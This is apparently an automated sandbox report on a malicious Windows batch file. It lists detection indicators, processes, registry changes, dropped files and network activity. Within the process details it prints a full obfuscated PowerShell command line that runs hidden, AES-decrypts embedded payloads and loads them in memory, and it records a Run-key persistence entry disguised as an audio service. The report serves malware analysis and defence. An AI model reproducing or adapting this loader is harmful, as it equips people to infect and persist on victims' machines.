File name:

Fedora.bat

Full analysis: https://app.any.run/tasks/c1eb59df-44d1-444d-95b2-5b0cebc1d654
Verdict: Malicious activity
Analysis date: March 24, 2025, 13:54:22
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (65536), with no line terminators
MD5:

BC8ED5024C0A92687A65B96A6E58718A

SHA1:

8F8FA35974FFD2C778343C64BD25D051A365E30B

SHA256:

7EE8506C982C0E86FFA495F432304E9C5B61BC4BDB0485BF99EA8BC4CE731966

SSDEEP:

3072:ZCANGztk2urqPe/ruVZs5eNWh/rlcQsKuE:XGzRuMe/qVY3rl/sO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 1240)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1912)
      • powershell.exe (PID: 7944)

    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)

    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)

  • SUSPICIOUS

    • Cryptography encrypted command line is found

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 1240)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 1240)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7868)
      • cmd.exe (PID: 1240)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)

    • The process executes VB scripts

      • powershell.exe (PID: 7944)

    • Executing commands from a ".bat" file

      • wscript.exe (PID: 5260)

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 5260)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5260)

  • INFO

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 6584)

    • Manual execution by a user

      • cmd.exe (PID: 7868)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7944)
      • powershell.exe (PID: 1912)

    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 7516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.cnt | Help File Contents (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
152
Monitored processes
16
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start openwith.exe no specs sppextcomobj.exe no specs slui.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs wscript.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
736\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1096"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
1240C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.bat" "C:\Windows\System32\cmd.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1600"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
1912"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $AOohLMBnxRyQWXffTUFsRfOSfpuMSlWsOLiZrnaajkFANCGLgWnruOAuavbvrPvlVgblPfNFUFjGznfCJJGWYEYZkNZWlEIuPuEHAvVaiHxOFTUMqzLIjzmqibabgRupXPRfIxboNFNqhjuqTmGMTZlqhozyuUUrnhQQcOdSxxVELWiYHKhT = 'C:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.bat'; $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC=[System.Security.Cryptography.Aes]::Create(); $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.Mode=[System.Security.Cryptography.CipherMode]::CBC; $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.Key=[System.Convert]::FromBase64String('kFtftI+s00kZRMSHam6GCX+w9PUdKxekjkw+JFIw4e0='); $rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.IV=[System.Convert]::FromBase64String('VoLwgkvwhw5sSTeuVWRJlA==');function decrypt_function($param_var){ $HCIifbixoWaZDpvRtAWqwYsVHrXeABvcbzWmHLFiMllSWgJzouqAXIfIjNANddXNBYXesikHUNDlNzYBIyPglUestncUlRfIoyrXiFhgjJFjeUVKOZfFoQCHTEKegqwcIVWpiasdqJWBoVozrsflMAuxWKeDUcaTnCBjXGBNHcoFUasYqlMN=$rdCQKQRbRyLjuLVLEOTQPTSTFWDJQmeJonzmhCAfGGnAkDdvtnCfFGixlJkNnilEtbUglJDcoOjjGrIbTipCKZeIfcayrMSyvJgiIWjKJzRQwYRUaiUeSIUuXmajIfKBWLOWkAtWZFTkinlgkgyiSNFNOMlwWZbEPqULkUJzPXfnPKmJaUYC.CreateDecryptor(); $kkqiBzsyWOioJdoLueBLQsEJlPDVrfnIpmIcmtIyndQSTaVQLGEmJbXSGHWLVxgRBAYwvmzbwdxNBLPlTMkLAbZooPvEwWCQWZrtbyvzgDPFEkrVRKSjnvqABKiFQVEzBGQCuwjurKEXltJeyAMMdsDBIQSrqQIlZpeYtPBvAySCRtphadgq=$HCIifbixoWaZDpvRtAWqwYsVHrXeABvcbzWmHLFiMllSWgJzouqAXIfIjNANddXNBYXesikHUNDlNzYBIyPglUestncUlRfIoyrXiFhgjJFjeUVKOZfFoQCHTEKegqwcIVWpiasdqJWBoVozrsflMAuxWKeDUcaTnCBjXGBNHcoFUasYqlMN.TransformFinalBlock($param_var, 0, $param_var.Length); $kkqiBzsyWOioJdoLueBLQsEJlPDVrfnIpmIcmtIyndQSTaVQLGEmJbXSGHWLVxgRBAYwvmzbwdxNBLPlTMkLAbZooPvEwWCQWZrtbyvzgDPFEkrVRKSjnvqABKiFQVEzBGQCuwjurKEXltJeyAMMdsDBIQSrqQIlZpeYtPBvAySCRtphadgq;}function execute_function($param_var,$param2_var){ $dpYpkmExViounVpjXhhIbxMBPCZosaRqRECeVQAILcENjaGsRqVLHbnGDwzHnpeVrYDIskngGzXZSYrPWGxcefIQrWBzqTuvXIwlxXZHcOehdnOEeKKGScRlqMqwJOQNeCbjCgrYGPZqbAMdhXuFiOCVRkVKHDYoXrdBmEbYtMadcBkPamoM=[System.Reflection.Assembly]::Load([byte[]]$param_var); $tlEqZgrskGrdRLsJxlRDVwlwNzSqafKuolVMMMCfmJNMuWlrjAsOuLQWZiCznbrfWWOFPFWKJMqmIzbQoBhzNVZCvYNEjcRlrIQxiFBDDHfIvDnzgLlMTSraXmjRSsBGVfVaJEIIaDWfPrhSKnxxQfrzqPAVvJLkgzNpHnQCdDLpWmlFergE=$dpYpkmExViounVpjXhhIbxMBPCZosaRqRECeVQAILcENjaGsRqVLHbnGDwzHnpeVrYDIskngGzXZSYrPWGxcefIQrWBzqTuvXIwlxXZHcOehdnOEeKKGScRlqMqwJOQNeCbjCgrYGPZqbAMdhXuFiOCVRkVKHDYoXrdBmEbYtMadcBkPamoM.EntryPoint; $tlEqZgrskGrdRLsJxlRDVwlwNzSqafKuolVMMMCfmJNMuWlrjAsOuLQWZiCznbrfWWOFPFWKJMqmIzbQoBhzNVZCvYNEjcRlrIQxiFBDDHfIvDnzgLlMTSraXmjRSsBGVfVaJEIIaDWfPrhSKnxxQfrzqPAVvJLkgzNpHnQCdDLpWmlFergE.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $AOohLMBnxRyQWXffTUFsRfOSfpuMSlWsOLiZrnaajkFANCGLgWnruOAuavbvrPvlVgblPfNFUFjGznfCJJGWYEYZkNZWlEIuPuEHAvVaiHxOFTUMqzLIjzmqibabgRupXPRfIxboNFNqhjuqTmGMTZlqhozyuUUrnhQQcOdSxxVELWiYHKhT;$gPpICRaBdJabrvwYleibbUhJwAYSUoJMnhwLAbLGvzkfOTVhkGiOytCmHGmcThHPZoOjZLxktCGBJbUCERHnfVoTFjeUPIMnRvfAeMhziYuWMaDGLJycztJeZUEPGDvKPsKnVtxRJhehAshEGxigkKNxMbBkirTEDKgtqpKslGsroBDHNZji = [type]::GetType('Syst'+'em'+'.I'+'O.F'+'i'+'l'+'e');$vozeFmBTSnJrozEQlNoqNQUDrvjkyTxiiKjokbOeOQzXXbdOXNvaLSvFuWNjcqvZQAjEqpFkYkCWqXGqsunLxwxpoEUooFbxvAhwSyyHhlcAqyowpxQIdKBtdTpMvqVsifBQPkxUVFDmuWZQpxZRPsuKYOtYiMlRqJslWyHfZWNxhpYgTzxY = [type]::GetType('S'+'ys'+'tem'+'.Env'+'iro'+'nme'+'nt');$VdQPNwKUdNmrSLZqESkxwVunubDeDUReCgpdIXBlCWyqquxkmUbmgJhaICvMTGqjViOLvWHGqZUAweXaEsRJTEXTZpugCPrWGpuiFLPqmuWhPHDEFvhBOGpqkVMgBBeAHXUhKOuSCBwzIQdsLQAgHQiZadXKZIOLpvzRNwTQbpYnkQHtRtvL = $gPpICRaBdJabrvwYleibbUhJwAYSUoJMnhwLAbLGvzkfOTVhkGiOytCmHGmcThHPZoOjZLxktCGBJbUCERHnfVoTFjeUPIMnRvfAeMhziYuWMaDGLJycztJeZUEPGDvKPsKnVtxRJhehAshEGxigkKNxMbBkirTEDKgtqpKslGsroBDHNZji::ReadAllText($AOohLMBnxRyQWXffTUFsRfOSfpuMSlWsOLiZrnaajkFANCGLgWnruOAuavbvrPvlVgblPfNFUFjGznfCJJGWYEYZkNZWlEIuPuEHAvVaiHxOFTUMqzLIjzmqibabgRupXPRfIxboNFNqhjuqTmGMTZlqhozyuUUrnhQQcOdSxxVELWiYHKhT);$bXSQPUgGRKSTMLjmqmFoWJfsSUPkvDSFndKsDIcSpnZqweBzGvcFOgPrRAYUfWknRmFJaRJHjMYJKOVNtpDaAmQgosAdKhNscLzkyRyPLvvcigHcElBPtkMEvyvIqGXcZFGYpLoBRNofROYiKxyzGXZSYUOZwPyfxtdCzJMTWZYFVHNHAnXT = $vozeFmBTSnJrozEQlNoqNQUDrvjkyTxiiKjokbOeOQzXXbdOXNvaLSvFuWNjcqvZQAjEqpFkYkCWqXGqsunLxwxpoEUooFbxvAhwSyyHhlcAqyowpxQIdKBtdTpMvqVsifBQPkxUVFDmuWZQpxZRPsuKYOtYiMlRqJslWyHfZWNxhpYgTzxY::NewLine;$iyvbGNZvWoebojIxLvIbKECHYtXrggzjSFXZYbWMJrWIUXrMZqWeEVjDVOdmQHpQOViJlIzJzVrtHUMbcksPkuEWwtdkYJWcbgTZOHAqRmFJDPWbbbkFpAFuqlnSFpLPZpsAaNmuKcXXPVsGxbiWzrNAAzJCtILCAQJoxvaoPPUnCHFuSHvD = $VdQPNwKUdNmrSLZqESkxwVunubDeDUReCgpdIXBlCWyqquxkmUbmgJhaICvMTGqjViOLvWHGqZUAweXaEsRJTEXTZpugCPrWGpuiFLPqmuWhPHDEFvhBOGpqkVMgBBeAHXUhKOuSCBwzIQdsLQAgHQiZadXKZIOLpvzRNwTQbpYnkQHtRtvL.Split($bXSQPUgGRKSTMLjmqmFoWJfsSUPkvDSFndKsDIcSpnZqweBzGvcFOgPrRAYUfWknRmFJaRJHjMYJKOVNtpDaAmQgosAdKhNscLzkyRyPLvvcigHcElBPtkMEvyvIqGXcZFGYpLoBRNofROYiKxyzGXZSYUOZwPyfxtdCzJMTWZYFVHNHAnXT);$kIwYEAYuYCTSKvdatEoejOpvdGFlfBRKNbgFLSmBQIUUEdTpSiFcwcJwsaUXVNpxLifJoyoAsMoAUvRaNpsWWPoKrKmKYoFdtwivXkauUeJJOiCXjTjGvsBWUvrElECdglhxmvdDoXcRfEViipAefZIbVmACSwjpCGDDbfLNQGrxqJQpzjwW = $iyvbGNZvWoebojIxLvIbKECHYtXrggzjSFXZYbWMJrWIUXrMZqWeEVjDVOdmQHpQOViJlIzJzVrtHUMbcksPkuEWwtdkYJWcbgTZOHAqRmFJDPWbbbkFpAFuqlnSFpLPZpsAaNmuKcXXPVsGxbiWzrNAAzJCtILCAQJoxvaoPPUnCHFuSHvD;foreach ($vYVxzapPhhTEQLheIgCPCaTrdXNTWXVmvjxfiKgPvqeHFEZkupUrLnfvfDtCnvSklGiHnbWYaNumVlMzYCyHcDBidcaEqECZyUwYvrWttWrXTSzTQUEKXliHfaDlbrIwkuOaPOdGGfngmDokCgNwaScmLOSuNLscoVNyezecQXeSXcvCMtJU in $kIwYEAYuYCTSKvdatEoejOpvdGFlfBRKNbgFLSmBQIUUEdTpSiFcwcJwsaUXVNpxLifJoyoAsMoAUvRaNpsWWPoKrKmKYoFdtwivXkauUeJJOiCXjTjGvsBWUvrElECdglhxmvdDoXcRfEViipAefZIbVmACSwjpCGDDbfLNQGrxqJQpzjwW) { if ($vYVxzapPhhTEQLheIgCPCaTrdXNTWXVmvjxfiKgPvqeHFEZkupUrLnfvfDtCnvSklGiHnbWYaNumVlMzYCyHcDBidcaEqECZyUwYvrWttWrXTSzTQUEKXliHfaDlbrIwkuOaPOdGGfngmDokCgNwaScmLOSuNLscoVNyezecQXeSXcvCMtJU.StartsWith(':: ')) { $dxYgDgCZUAKSOMpzbsgcDNozHkKlwldJZmmeHwaVDLSpVzJDurogctsqjzysvqDJxbSBAlREskzSUYDiBhReWWHGUWUiXHAmijSUGhdiAKORTAvlVqRnyzNBtmHDrIGLKnJLfIBteIDlhPNtAInHPnNJvqAuAzRSedhGQKfmOyjQVCtDyndI=$vYVxzapPhhTEQLheIgCPCaTrdXNTWXVmvjxfiKgPvqeHFEZkupUrLnfvfDtCnvSklGiHnbWYaNumVlMzYCyHcDBidcaEqECZyUwYvrWttWrXTSzTQUEKXliHfaDlbrIwkuOaPOdGGfngmDokCgNwaScmLOSuNLscoVNyezecQXeSXcvCMtJU.Substring(3); break; }}$payloads_var=[string[]]$dxYgDgCZUAKSOMpzbsgcDNozHkKlwldJZmmeHwaVDLSpVzJDurogctsqjzysvqDJxbSBAlREskzSUYDiBhReWWHGUWUiXHAmijSUGhdiAKORTAvlVqRnyzNBtmHDrIGLKnJLfIBteIDlhPNtAInHPnNJvqAuAzRSedhGQKfmOyjQVCtDyndI.Split('\');$payload1_var= decrypt_function ([Convert]::FromBase64String($payloads_var[0]));$payload2_var= decrypt_function ([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
5260"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.vbs" C:\Windows\System32\wscript.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5392"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
6248"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
6584"C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\Fedora.bat.cntC:\Windows\System32\OpenWith.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
2147943623
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
7332C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
Total events
12 047
Read events
12 030
Write events
17
Delete events
0

Modification events

(PID) Process:(7944) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:RtkAudUService
Value:
C:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.vbs
(PID) Process:(7944) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(5392) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5392) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5392) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(7516) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7516) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7516) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(6248) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6248) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
Executable files
0
Suspicious files
6
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
7516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\707a6539-2232-46c5-ad59-2a51fba71ae5.down_data
MD5:
SHA256:
7516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:4872BABAF39AA62B8D32695EBB7E9173
SHA256:2EE85DF86EE29BBEB3DCA81AA29B6DE204F605A2769B84C728A329178A2D0999
7944powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sfsswxsn.esu.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7944powershell.exeC:\Users\admin\AppData\Local\Adobe-Hub\uxxbhtaqd5x11.vbstext
MD5:0449B7207BB68AA8D3B6F73B8C66088D
SHA256:67068058C0A33FB06331741B4F2D85B984ED7AF22D8F19DEA700FFEAB996FD36
7944powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:ED224F49E1E808CBA695270499DB54B7
SHA256:57A436248566BEC413EC218CF6064996CB7A6BC4753F85940FDF92098B96E4CC
1912powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_meaavdaw.hqr.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7944powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bfx0z2yw.awx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1912powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4juj3sa1.alm.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\920d1ee9-35aa-4cfd-a4b8-bc9c3be3af3c.up_meta_securebinary
MD5:F6C6FCBF18E5D2604A46D69020E9B9E5
SHA256:CB2E7C76863634E5DA47463BCD91CFEF7EE2860827E289318DE048DBE1DE73BF
7516BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\920d1ee9-35aa-4cfd-a4b8-bc9c3be3af3c.77546dd5-0094-45b8-a465-52b0f5db595e.down_metabinary
MD5:945879C7A7991CA0A446BCB1EC0A6B58
SHA256:53BAA36F81B355B6A619EFCA169BF4B13802024AF6442AE49D974B78E8CFFECD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
23
DNS requests
14
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7516
BackgroundTransferHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
